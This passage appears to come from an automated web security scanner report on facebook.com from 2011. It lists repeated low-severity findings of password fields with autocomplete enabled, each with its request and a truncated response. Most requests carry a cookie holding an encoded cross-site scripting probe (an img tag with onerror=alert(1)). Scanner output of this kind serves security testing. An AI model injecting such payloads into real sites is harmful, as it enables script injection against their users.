Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.75
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.44. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Gilco-Corporation/109823499042436

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Gilco-Corporation/109823499042436 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.156.75
Connection: close
Date: Thu, 05 May 2011 11:41:52 GMT
Content-Length: 26978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.45. http://www.facebook.com/pages/HMFIC/149403761740008

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HMFIC/149403761740008

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/HMFIC/149403761740008 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.83
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 26855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.46. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Manchester-Connecticut/112527912096312

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Manchester-Connecticut/112527912096312 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.35
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 41389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.47. http://www.facebook.com/pages/Merchandiser/123981654314779

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Merchandiser/123981654314779

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Merchandiser/123981654314779 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.41
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 26925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.48. http://www.facebook.com/pages/New-Haven-College/130105783687523

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/New-Haven-College/130105783687523

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/New-Haven-College/130105783687523 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.61
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 26979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.49. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Northern-Illinois-University/108155335871674

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Northern-Illinois-University/108155335871674 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.57
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.50. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/San-Antonio-Texas/110297742331680

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/San-Antonio-Texas/110297742331680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.69
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 39429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.51. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/School-of-Hard-Knocks-University-of-Life/115228431825707 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.39
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.52. http://www.facebook.com/pages/Sporting-News/104068362964496

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Sporting-News/104068362964496

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/Sporting-News/104068362964496 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.135.73
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.53. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.37
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 47298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.54. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/University-of-Chicago-Semester-in-Madrid/144554762263161 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.159.71
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.55. http://www.facebook.com/pages/create.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.56. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/memorial-high-school-west-new-york-nj/114508558584580 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
